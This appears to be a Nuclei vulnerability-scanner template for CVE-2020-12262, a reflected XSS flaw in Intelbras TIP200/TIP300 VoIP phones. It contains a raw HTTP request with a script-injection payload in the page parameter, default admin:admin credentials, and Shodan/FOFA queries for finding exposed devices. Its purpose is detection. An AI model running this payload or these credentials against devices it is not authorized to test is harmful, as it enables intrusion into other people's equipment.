Intelbras TIP200 60.61.75.15, TIP200LITE 60.61.75.15, and TIP300 65.61.75.15 are vulnerable to reflected cross-site scripting (XSS) via the page parameter in /cgi-bin/cgiServer.exx, allowing attackers to execute arbitrary JavaScript in the context of the user.
PoC代码[已公开]
id: CVE-2020-12262
info:
name: Intelbras TIP200/TIP200LITE/TIP300 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Intelbras TIP200 60.61.75.15, TIP200LITE 60.61.75.15, and TIP300 65.61.75.15 are vulnerable to reflected cross-site scripting (XSS) via the page parameter in /cgi-bin/cgiServer.exx, allowing attackers to execute arbitrary JavaScript in the context of the user.
remediation: |
Update the device firmware to the latest version provided by Intelbras.
reference:
- https://lucxs.medium.com/cve-2020-12262-xss-voip-intelbras-d5697e31fbf6
- https://www.youtube.com/watch?v=rihboOgiJRs
- https://nvd.nist.gov/vuln/detail/CVE-2020-12262
classification:
cve-id: CVE-2020-12262
cwe-id: CWE-79
epss-score: 0.02983
epss-percentile: 0.86034
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
cvss-score: 5.4
metadata:
max-request: 1
product: tip300
vendor: intelbras
shodan-query: title:"Intelbras"
fofa-query: title="Intelbras"
tags: cve,cve2020,intelbras,tip200,tip200lite,tip300,xss,authenticated
variables:
username: "admin"
password: "admin"
http:
- raw:
- |
GET /cgi-bin/cgiServer.exx?page=<script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}
skip-variables-check: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "File not found"
condition: and
- type: word
part: content_type
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100dc964f14defccef8e7e4166e2f46580e576f85f3718472762cc891637e867597022017ba73096be5aa67e1ac17198deab39c013417d180d76cb055d36ce49f1a6589:922c64590222798bb761d5b6d8e72950